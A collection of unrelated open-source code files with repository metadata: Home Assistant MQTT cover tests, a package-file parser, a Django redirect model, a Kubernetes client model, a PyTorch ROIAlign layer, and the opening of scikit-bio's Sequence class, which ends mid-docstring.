hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
)
async def test_state_and_position_topics_state_not_set_via_position_topic(
hass, mqtt_mock
):
"""Test state is not set via position topic when both state and position topics are set."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"position_topic": "get-position-topic",
"position_open": 100,
"position_closed": 0,
"state_open": "OPEN",
"state_closed": "CLOSE",
"command_topic": "command-topic",
"qos": 0,
}
},
)
await hass.async_block_till_done()
state = hass.states.get("cover.test")
assert state.state == STATE_UNKNOWN
assert not state.attributes.get(ATTR_ASSUMED_STATE)
async_fire_mqtt_message(hass, "state-topic", "OPEN")
state = hass.states.get("cover.test")
assert state.state == STATE_OPEN
async_fire_mqtt_message(hass, "get-position-topic", "0")
state = hass.states.get("cover.test")
assert state.state == STATE_OPEN
async_fire_mqtt_message(hass, "get-position-topic", "100")
state = hass.states.get("cover.test")
assert state.state == STATE_OPEN
async_fire_mqtt_message(hass, "state-topic", "CLOSE")
state = hass.states.get("cover.test")
assert state.state == STATE_CLOSED
async_fire_mqtt_message(hass, "get-position-topic", "0")
state = hass.states.get("cover.test")
assert state.state == STATE_CLOSED
async_fire_mqtt_message(hass, "get-position-topic", "100")
state = hass.states.get("cover.test")
assert state.state == STATE_CLOSED
async def test_set_state_via_position_using_stopped_state(hass, mqtt_mock):
"""Test the controlling state via position topic using stopped state."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"position_topic": "get-position-topic",
"position_open": 100,
"position_closed": 0,
"state_open": "OPEN",
"state_closed": "CLOSE",
"state_stopped": "STOPPED",
"command_topic": "command-topic",
"qos": 0,
}
},
)
await hass.async_block_till_done()
state = hass.states.get("cover.test")
assert state.state == STATE_UNKNOWN
assert not state.attributes.get(ATTR_ASSUMED_STATE)
async_fire_mqtt_message(hass, "state-topic", "OPEN")
state = hass.states.get("cover.test")
assert state.state == STATE_OPEN
async_fire_mqtt_message(hass, "get-position-topic", "0")
state = hass.states.get("cover.test")
assert state.state == STATE_OPEN
async_fire_mqtt_message(hass, "state-topic", "STOPPED")
state = hass.states.get("cover.test")
assert state.state == STATE_CLOSED
async_fire_mqtt_message(hass, "get-position-topic", "100")
state = hass.states.get("cover.test")
assert state.state == STATE_CLOSED
async_fire_mqtt_message(hass, "state-topic", "STOPPED")
state = hass.states.get("cover.test")
assert state.state == STATE_OPEN
async def test_position_via_position_topic_template(hass, mqtt_mock):
"""Test position by updating status via position template."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"set_position_topic": "set-position-topic",
"position_topic": "get-position-topic",
"position_template": "{{ (value | multiply(0.01)) | int }}",
}
},
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "get-position-topic", "99")
current_cover_position_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
assert current_cover_position_position == 0
async_fire_mqtt_message(hass, "get-position-topic", "5000")
current_cover_position_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
assert current_cover_position_position == 50
async def test_position_via_position_topic_template_json_value(hass, mqtt_mock, caplog):
"""Test position by updating status via position template with a JSON value."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"set_position_topic": "set-position-topic",
"position_topic": "get-position-topic",
"position_template": "{{ value_json.Var1 }}",
}
},
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "get-position-topic", '{"Var1": 9, "Var2": 60}')
current_cover_position_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
assert current_cover_position_position == 9
async_fire_mqtt_message(hass, "get-position-topic", '{"Var1": 50, "Var2": 10}')
current_cover_position_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
assert current_cover_position_position == 50
async_fire_mqtt_message(hass, "get-position-topic", '{"Var2": 60}')
assert (
"Template variable warning: 'dict object' has no attribute 'Var1' when rendering"
) in caplog.text
async def test_position_template_with_entity_id(hass, mqtt_mock):
"""Test position by updating status via position template."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"set_position_topic": "set-position-topic",
"position_topic": "get-position-topic",
"position_template": '\
{% if state_attr(entity_id, "current_position") != None %}\
{{ value | int + state_attr(entity_id, "current_position") }} \
{% else %} \
{{ value }} \
{% endif %}',
}
},
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "get-position-topic", "10")
current_cover_position_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
assert current_cover_position_position == 10
async_fire_mqtt_message(hass, "get-position-topic", "10")
current_cover_position_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
assert current_cover_position_position == 20
async def test_position_via_position_topic_template_return_json(hass, mqtt_mock):
"""Test position by updating status via position template and returning json."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"set_position_topic": "set-position-topic",
"position_topic": "get-position-topic",
"position_template": '{{ {"position" : value} | tojson }}',
}
},
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "get-position-topic", "55")
current_cover_position_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
assert current_cover_position_position == 55
async def test_position_via_position_topic_template_return_json_warning(
hass, caplog, mqtt_mock
):
"""Test position by updating status via position template returning json without position attribute."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"set_position_topic": "set-position-topic",
"position_topic": "get-position-topic",
"position_template": '{{ {"pos" : value} | tojson }}',
}
},
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "get-position-topic", "55")
assert (
"Template (position_template) returned JSON without position attribute"
in caplog.text
)
async def test_position_and_tilt_via_position_topic_template_return_json(
hass, mqtt_mock
):
"""Test position and tilt by updating the position via position template."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"set_position_topic": "set-position-topic",
"position_topic": "get-position-topic",
"position_template": '\
{{ {"position" : value, "tilt_position" : (value | int / 2)| int } | tojson }}',
}
},
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "get-position-topic", "0")
current_cover_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
current_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_position == 0 and current_tilt_position == 0
async_fire_mqtt_message(hass, "get-position-topic", "99")
current_cover_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
current_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_position == 99 and current_tilt_position == 49
async def test_position_via_position_topic_template_all_variables(hass, mqtt_mock):
"""Test position by updating status via position template."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"set_position_topic": "set-position-topic",
"position_topic": "get-position-topic",
"tilt_command_topic": "tilt-command-topic",
"position_open": 99,
"position_closed": 1,
"tilt_min": 11,
"tilt_max": 22,
"position_template": "\
{% if value | int < tilt_max %}\
{{ tilt_min }}\
{% endif %}\
{% if value | int > position_closed %}\
{{ position_open }}\
{% endif %}",
}
},
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "get-position-topic", "0")
current_cover_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
assert current_cover_position == 10
async_fire_mqtt_message(hass, "get-position-topic", "55")
current_cover_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
assert current_cover_position == 100
async def test_set_state_via_stopped_state_no_position_topic(hass, mqtt_mock):
"""Test the controlling state via stopped state when no position topic."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"state_open": "OPEN",
"state_closed": "CLOSE",
"state_stopped": "STOPPED",
"state_opening": "OPENING",
"state_closing": "CLOSING",
"command_topic": "command-topic",
"qos": 0,
"optimistic": False,
}
},
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "state-topic", "OPEN")
state = hass.states.get("cover.test")
assert state.state == STATE_OPEN
async_fire_mqtt_message(hass, "state-topic", "OPENING")
state = hass.states.get("cover.test")
assert state.state == STATE_OPENING
async_fire_mqtt_message(hass, "state-topic", "STOPPED")
state = hass.states.get("cover.test")
assert state.state == STATE_OPEN
async_fire_mqtt_message(hass, "state-topic", "CLOSING")
state = hass.states.get("cover.test")
assert state.state == STATE_CLOSING
async_fire_mqtt_message(hass, "state-topic", "STOPPED")
state = hass.states.get("cover.test")
assert state.state == STATE_CLOSED
async def test_position_via_position_topic_template_return_invalid_json(
hass, caplog, mqtt_mock
):
"""Test position by updating status via position template and returning invalid json."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"set_position_topic": "set-position-topic",
"position_topic": "get-position-topic",
"position_template": '{{ {"position" : invalid_json} }}',
}
},
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "get-position-topic", "55")
assert ("Payload '{'position': Undefined}' is not numeric") in caplog.text
async def test_set_position_topic_without_get_position_topic_error(
hass, caplog, mqtt_mock
):
"""Test error when set_position_topic is used without position_topic."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"command_topic": "command-topic",
"set_position_topic": "set-position-topic",
"value_template": "{{100-62}}",
}
},
)
await hass.async_block_till_done()
assert (
f"'{CONF_SET_POSITION_TOPIC}' must be set together with '{CONF_GET_POSITION_TOPIC}'."
) in caplog.text
async def test_value_template_without_state_topic_error(hass, caplog, mqtt_mock):
"""Test error when value_template is used and state_topic is missing."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"command_topic": "command-topic",
"value_template": "{{100-62}}",
}
},
)
await hass.async_block_till_done()
assert (
f"'{CONF_VALUE_TEMPLATE}' must be set together with '{CONF_STATE_TOPIC}'."
) in caplog.text
async def test_position_template_without_position_topic_error(hass, caplog, mqtt_mock):
"""Test error when position_template is used and position_topic is missing."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"command_topic": "command-topic",
"position_template": "{{100-52}}",
}
},
)
await hass.async_block_till_done()
assert (
f"'{CONF_GET_POSITION_TEMPLATE}' must be set together with '{CONF_GET_POSITION_TOPIC}'."
in caplog.text
)
async def test_set_position_template_without_set_position_topic(
hass, caplog, mqtt_mock
):
"""Test error when set_position_template is used and set_position_topic is missing."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"command_topic": "command-topic",
"set_position_template": "{{100-42}}",
}
},
)
await hass.async_block_till_done()
assert (
f"'{CONF_SET_POSITION_TEMPLATE}' must be set together with '{CONF_SET_POSITION_TOPIC}'."
in caplog.text
)
async def test_tilt_command_template_without_tilt_command_topic(
hass, caplog, mqtt_mock
):
"""Test error when tilt_command_template is used and tilt_command_topic is missing."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"command_topic": "command-topic",
"tilt_command_template": "{{100-32}}",
}
},
)
await hass.async_block_till_done()
assert (
f"'{CONF_TILT_COMMAND_TEMPLATE}' must be set together with '{CONF_TILT_COMMAND_TOPIC}'."
in caplog.text
)
async def test_tilt_status_template_without_tilt_status_topic_topic(
hass, caplog, mqtt_mock
):
"""Test error when tilt_status_template is used and tilt_status_topic is missing."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"command_topic": "command-topic",
"tilt_status_template": "{{100-22}}",
}
},
)
await hass.async_block_till_done()
assert (
f"'{CONF_TILT_STATUS_TEMPLATE}' must be set together with '{CONF_TILT_STATUS_TOPIC}'."
in caplog.text
)
|
{
"content_hash": "9c12c719f4530f0853da3388a51c183c",
"timestamp": "",
"source": "github",
"line_count": 3059,
"max_line_length": 107,
"avg_line_length": 32.10624387054593,
"alnum_prop": 0.5565658314072475,
"repo_name": "home-assistant/home-assistant",
"id": "794d143ac832a69b52404f6643e4698173c3e6b1",
"size": "98213",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "tests/components/mqtt/test_cover.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "20557383"
},
{
"name": "Shell",
"bytes": "6671"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from wtl.wtparser import parsers
__all__ = ['parse', 'get_parser_for_filename']
def parse(content, filetype=None):
"""
Parse the packages file and return the data in the following format::
{
'filename': 'Gemfile',
'language': 'Objective-C',
'platform': 'ios',
'version': '7.0',
'packages': [
{
'name': 'Django',
'version': '1.7',
},
]
}
:param content: the package file contents
:param filetype: the package file type, for example `requirements`,
`gemfile`, `podfile`. May be `None` to ask the parser to detect the
type automatically.
"""
parser = guess(content) if filetype is None else load(filetype)
return parser.parse(content)
def get_parser_for_filename(filename):
for name in parsers.available_parsers:
parser = load_by_name(name)()
if parser.filename == filename:
return parser
return None
def guess(content):
for name in parsers.available_parsers:
parser = load_by_name(name)()
if parser.detect(content):
return parser
raise AttributeError('No parser for this file.')
def load(filetype):
return load_by_name('{0}Parser'.format(filetype.capitalize()))()
def load_by_name(name):
return getattr(parsers, name)
|
{
"content_hash": "c50ed1785df3b26ca1fd136b75879125",
"timestamp": "",
"source": "github",
"line_count": 56,
"max_line_length": 75,
"avg_line_length": 26,
"alnum_prop": 0.5810439560439561,
"repo_name": "elegion/djangodash2013",
"id": "a5419703ee1b1249474bc35cbae80d83420dfefc",
"size": "1456",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "wtl/wtparser/parser.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "312"
},
{
"name": "JavaScript",
"bytes": "31"
},
{
"name": "Python",
"bytes": "50900"
}
],
"symlink_target": ""
}
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.utils.encoding import python_2_unicode_compatible
class Redirect(models.Model):
old_path = models.CharField(_('redirect from'), max_length=200, db_index=True, unique=True,
help_text=_("This should be an absolute path, excluding the domain name. Example: '/events/search/'."))
new_path = models.CharField(_('redirect to'), max_length=200, blank=True,
help_text=_("This can be either an absolute path (as above) or a full URL starting with 'http://'."))
regular_expression = models.BooleanField(_('Match using regular expressions'),
default=False,
help_text=_("If checked, the redirect-from and redirect-to fields will also be processed using regular expressions when matching incoming requests.<br>Example: <strong>/projects/.* -> /#!/projects</strong> will redirect everyone visiting a page starting with /projects/<br>Example: <strong>/projects/(.*) -> /#!/projects/$1</strong> will turn /projects/myproject into /#!/projects/myproject<br><br>Invalid regular expressions will be ignored."))
fallback_redirect = models.BooleanField(_("Fallback redirect"),
default=False,
help_text=_("This redirect is only matched after all other redirects have failed to match.<br>This allows us to define a general 'catch-all' that is only used as a fallback after more specific redirects have been attempted."))
nr_times_visited = models.IntegerField(default=0,
help_text=_("Is incremented each time a visitor hits this redirect"))
class Meta:
verbose_name = _('redirect')
verbose_name_plural = _('redirects')
db_table = 'django_redirect'
ordering = ('fallback_redirect', 'regular_expression', 'old_path',)
def __str__(self):
return "%s ---> %s" % (self.old_path, self.new_path)
|
{
"content_hash": "97c8e784c5db6fad7d0b9f454d14527e",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 490,
"avg_line_length": 74,
"alnum_prop": 0.637065637065637,
"repo_name": "onepercentclub/onepercentclub-site",
"id": "d5879c504623da7d65193e61fa64286626fb362d",
"size": "2072",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "apps/redirects/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "13896"
},
{
"name": "CSS",
"bytes": "351343"
},
{
"name": "HTML",
"bytes": "898027"
},
{
"name": "Handlebars",
"bytes": "246489"
},
{
"name": "JavaScript",
"bytes": "168884"
},
{
"name": "Python",
"bytes": "1511371"
},
{
"name": "Ruby",
"bytes": "1050"
},
{
"name": "Shell",
"bytes": "74046"
}
],
"symlink_target": ""
}
|
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: release-1.25
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class V2HorizontalPodAutoscalerSpec(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'behavior': 'V2HorizontalPodAutoscalerBehavior',
'max_replicas': 'int',
'metrics': 'list[V2MetricSpec]',
'min_replicas': 'int',
'scale_target_ref': 'V2CrossVersionObjectReference'
}
attribute_map = {
'behavior': 'behavior',
'max_replicas': 'maxReplicas',
'metrics': 'metrics',
'min_replicas': 'minReplicas',
'scale_target_ref': 'scaleTargetRef'
}
def __init__(self, behavior=None, max_replicas=None, metrics=None, min_replicas=None, scale_target_ref=None, local_vars_configuration=None): # noqa: E501
"""V2HorizontalPodAutoscalerSpec - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._behavior = None
self._max_replicas = None
self._metrics = None
self._min_replicas = None
self._scale_target_ref = None
self.discriminator = None
if behavior is not None:
self.behavior = behavior
self.max_replicas = max_replicas
if metrics is not None:
self.metrics = metrics
if min_replicas is not None:
self.min_replicas = min_replicas
self.scale_target_ref = scale_target_ref
@property
def behavior(self):
"""Gets the behavior of this V2HorizontalPodAutoscalerSpec. # noqa: E501
:return: The behavior of this V2HorizontalPodAutoscalerSpec. # noqa: E501
:rtype: V2HorizontalPodAutoscalerBehavior
"""
return self._behavior
@behavior.setter
def behavior(self, behavior):
"""Sets the behavior of this V2HorizontalPodAutoscalerSpec.
:param behavior: The behavior of this V2HorizontalPodAutoscalerSpec. # noqa: E501
:type: V2HorizontalPodAutoscalerBehavior
"""
self._behavior = behavior
@property
def max_replicas(self):
"""Gets the max_replicas of this V2HorizontalPodAutoscalerSpec. # noqa: E501
maxReplicas is the upper limit for the number of replicas to which the autoscaler can scale up. It cannot be less that minReplicas. # noqa: E501
:return: The max_replicas of this V2HorizontalPodAutoscalerSpec. # noqa: E501
:rtype: int
"""
return self._max_replicas
@max_replicas.setter
def max_replicas(self, max_replicas):
"""Sets the max_replicas of this V2HorizontalPodAutoscalerSpec.
maxReplicas is the upper limit for the number of replicas to which the autoscaler can scale up. It cannot be less that minReplicas. # noqa: E501
:param max_replicas: The max_replicas of this V2HorizontalPodAutoscalerSpec. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and max_replicas is None: # noqa: E501
raise ValueError("Invalid value for `max_replicas`, must not be `None`") # noqa: E501
self._max_replicas = max_replicas
@property
def metrics(self):
"""Gets the metrics of this V2HorizontalPodAutoscalerSpec. # noqa: E501
metrics contains the specifications for which to use to calculate the desired replica count (the maximum replica count across all metrics will be used). The desired replica count is calculated multiplying the ratio between the target value and the current value by the current number of pods. Ergo, metrics used must decrease as the pod count is increased, and vice-versa. See the individual metric source types for more information about how each type of metric must respond. If not set, the default metric will be set to 80% average CPU utilization. # noqa: E501
:return: The metrics of this V2HorizontalPodAutoscalerSpec. # noqa: E501
:rtype: list[V2MetricSpec]
"""
return self._metrics
@metrics.setter
def metrics(self, metrics):
"""Sets the metrics of this V2HorizontalPodAutoscalerSpec.
metrics contains the specifications for which to use to calculate the desired replica count (the maximum replica count across all metrics will be used). The desired replica count is calculated multiplying the ratio between the target value and the current value by the current number of pods. Ergo, metrics used must decrease as the pod count is increased, and vice-versa. See the individual metric source types for more information about how each type of metric must respond. If not set, the default metric will be set to 80% average CPU utilization. # noqa: E501
:param metrics: The metrics of this V2HorizontalPodAutoscalerSpec. # noqa: E501
:type: list[V2MetricSpec]
"""
self._metrics = metrics
@property
def min_replicas(self):
"""Gets the min_replicas of this V2HorizontalPodAutoscalerSpec. # noqa: E501
minReplicas is the lower limit for the number of replicas to which the autoscaler can scale down. It defaults to 1 pod. minReplicas is allowed to be 0 if the alpha feature gate HPAScaleToZero is enabled and at least one Object or External metric is configured. Scaling is active as long as at least one metric value is available. # noqa: E501
:return: The min_replicas of this V2HorizontalPodAutoscalerSpec. # noqa: E501
:rtype: int
"""
return self._min_replicas
@min_replicas.setter
def min_replicas(self, min_replicas):
"""Sets the min_replicas of this V2HorizontalPodAutoscalerSpec.
minReplicas is the lower limit for the number of replicas to which the autoscaler can scale down. It defaults to 1 pod. minReplicas is allowed to be 0 if the alpha feature gate HPAScaleToZero is enabled and at least one Object or External metric is configured. Scaling is active as long as at least one metric value is available. # noqa: E501
:param min_replicas: The min_replicas of this V2HorizontalPodAutoscalerSpec. # noqa: E501
:type: int
"""
self._min_replicas = min_replicas
@property
def scale_target_ref(self):
"""Gets the scale_target_ref of this V2HorizontalPodAutoscalerSpec. # noqa: E501
:return: The scale_target_ref of this V2HorizontalPodAutoscalerSpec. # noqa: E501
:rtype: V2CrossVersionObjectReference
"""
return self._scale_target_ref
@scale_target_ref.setter
def scale_target_ref(self, scale_target_ref):
"""Sets the scale_target_ref of this V2HorizontalPodAutoscalerSpec.
:param scale_target_ref: The scale_target_ref of this V2HorizontalPodAutoscalerSpec. # noqa: E501
:type: V2CrossVersionObjectReference
"""
if self.local_vars_configuration.client_side_validation and scale_target_ref is None: # noqa: E501
raise ValueError("Invalid value for `scale_target_ref`, must not be `None`") # noqa: E501
self._scale_target_ref = scale_target_ref
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V2HorizontalPodAutoscalerSpec):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V2HorizontalPodAutoscalerSpec):
return True
return self.to_dict() != other.to_dict()
|
{
"content_hash": "bd2a7ee9e92902af817393bc982ff627",
"timestamp": "",
"source": "github",
"line_count": 230,
"max_line_length": 576,
"avg_line_length": 40.76521739130435,
"alnum_prop": 0.6546501706484642,
"repo_name": "kubernetes-client/python",
"id": "afc682b7b6177ea4e11d90e86369e7f14bfcffa7",
"size": "9393",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kubernetes/client/models/v2_horizontal_pod_autoscaler_spec.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "356"
},
{
"name": "Python",
"bytes": "11454299"
},
{
"name": "Shell",
"bytes": "43108"
}
],
"symlink_target": ""
}
|
import torch
from torch import nn
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.nn.modules.utils import _pair
from maskrcnn_benchmark import _C
from apex import amp
class _ROIAlign(Function):
@staticmethod
def forward(ctx, input, roi, output_size, spatial_scale, sampling_ratio):
ctx.save_for_backward(roi)
ctx.output_size = _pair(output_size)
ctx.spatial_scale = spatial_scale
ctx.sampling_ratio = sampling_ratio
ctx.input_shape = input.size()
output = _C.roi_align_forward(
input, roi, spatial_scale, output_size[0], output_size[1], sampling_ratio
)
return output
@staticmethod
@once_differentiable
def backward(ctx, grad_output):
rois, = ctx.saved_tensors
output_size = ctx.output_size
spatial_scale = ctx.spatial_scale
sampling_ratio = ctx.sampling_ratio
bs, ch, h, w = ctx.input_shape
grad_input = _C.roi_align_backward(
grad_output,
rois,
spatial_scale,
output_size[0],
output_size[1],
bs,
ch,
h,
w,
sampling_ratio,
)
return grad_input, None, None, None, None
roi_align = _ROIAlign.apply
class ROIAlign(nn.Module):
def __init__(self, output_size, spatial_scale, sampling_ratio):
super(ROIAlign, self).__init__()
self.output_size = output_size
self.spatial_scale = spatial_scale
self.sampling_ratio = sampling_ratio
@amp.float_function
def forward(self, input, rois):
return roi_align(
input, rois, self.output_size, self.spatial_scale, self.sampling_ratio
)
def __repr__(self):
tmpstr = self.__class__.__name__ + "("
tmpstr += "output_size=" + str(self.output_size)
tmpstr += ", spatial_scale=" + str(self.spatial_scale)
tmpstr += ", sampling_ratio=" + str(self.sampling_ratio)
tmpstr += ")"
return tmpstr
|
{
"content_hash": "926bed69d2941b59a3d580ffcb0a972b",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 85,
"avg_line_length": 30.61764705882353,
"alnum_prop": 0.5965417867435159,
"repo_name": "mlperf/training_results_v0.6",
"id": "e68c96b6c0444989e9c1d1a07b9d5e97da2b2eb3",
"size": "2221",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "NVIDIA/benchmarks/maskrcnn/implementations/pytorch/maskrcnn_benchmark/layers/roi_align.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ANTLR",
"bytes": "1731"
},
{
"name": "Batchfile",
"bytes": "13941"
},
{
"name": "C",
"bytes": "208630"
},
{
"name": "C++",
"bytes": "10999411"
},
{
"name": "CMake",
"bytes": "129712"
},
{
"name": "CSS",
"bytes": "64767"
},
{
"name": "Clojure",
"bytes": "396764"
},
{
"name": "Cuda",
"bytes": "2272433"
},
{
"name": "Dockerfile",
"bytes": "67820"
},
{
"name": "Groovy",
"bytes": "62557"
},
{
"name": "HTML",
"bytes": "19753082"
},
{
"name": "Java",
"bytes": "166294"
},
{
"name": "JavaScript",
"bytes": "71846"
},
{
"name": "Julia",
"bytes": "408765"
},
{
"name": "Jupyter Notebook",
"bytes": "2713169"
},
{
"name": "Lua",
"bytes": "4430"
},
{
"name": "MATLAB",
"bytes": "34903"
},
{
"name": "Makefile",
"bytes": "115694"
},
{
"name": "Perl",
"bytes": "1535873"
},
{
"name": "Perl 6",
"bytes": "7280"
},
{
"name": "PowerShell",
"bytes": "6150"
},
{
"name": "Python",
"bytes": "24905683"
},
{
"name": "R",
"bytes": "351865"
},
{
"name": "Roff",
"bytes": "293052"
},
{
"name": "Scala",
"bytes": "1189019"
},
{
"name": "Shell",
"bytes": "794096"
},
{
"name": "Smalltalk",
"bytes": "3497"
},
{
"name": "TypeScript",
"bytes": "361164"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, division, print_function
from future.builtins import range, zip
from future.utils import viewitems
import six
import re
import collections
import copy
import numbers
from contextlib import contextmanager
import numpy as np
from scipy.spatial.distance import hamming
import pandas as pd
from skbio._base import SkbioObject
from skbio.sequence._repr import _SequenceReprBuilder
from skbio.util._decorator import stable, experimental, classonlymethod
class Sequence(collections.Sequence, SkbioObject):
"""Store biological sequence data and optional associated metadata.
``Sequence`` objects do not enforce an alphabet and are thus the most
generic objects for storing biological sequence data. Subclasses ``DNA``,
``RNA``, and ``Protein`` enforce the IUPAC character set [1]_ for, and
provide operations specific to, each respective molecule type.
``Sequence`` objects consist of the underlying sequence data, as well
as optional metadata and positional metadata. The underlying sequence
is immutable, while the metdata and positional metadata are mutable.
Parameters
----------
sequence : str, Sequence, or 1D np.ndarray (np.uint8 or '\|S1')
Characters representing the biological sequence itself.
metadata : dict, optional
Arbitrary metadata which applies to the entire sequence. A shallow copy
of the ``dict`` will be made (see Examples section below for details).
positional_metadata : pd.DataFrame consumable, optional
Arbitrary per-character metadata (e.g., sequence read quality
scores). Must be able to be passed directly to ``pd.DataFrame``
constructor. Each column of metadata must be the same length as the
biological sequence. A shallow copy of the positional metadata will be
made if necessary (see Examples section below for details).
lowercase : bool or str, optional
If ``True``, lowercase sequence characters will be converted to
uppercase characters. If ``False``, no characters will be converted.
If a str, it will be treated as a key into the positional metadata of
the object. All lowercase characters will be converted to uppercase,
and a ``True`` value will be stored in a boolean array in the
positional metadata under the key.
Attributes
----------
values
metadata
positional_metadata
observed_chars
See Also
--------
DNA
RNA
Protein
References
----------
.. [1] Nomenclature for incompletely specified bases in nucleic acid
sequences: recommendations 1984.
Nucleic Acids Res. May 10, 1985; 13(9): 3021-3030.
A Cornish-Bowden
Examples
--------
>>> from pprint import pprint
>>> from skbio import Sequence
**Creating sequences:**
Create a sequence without any metadata:
>>> seq = Sequence('GGUCGUGAAGGA')
>>> seq
Sequence
---------------
Stats:
length: 12
---------------
0 GGUCGUGAAG GA
Create a sequence with metadata and positional metadata:
>>> metadata = {'id':'seq-id', 'desc':'seq desc', 'authors': ['Alice']}
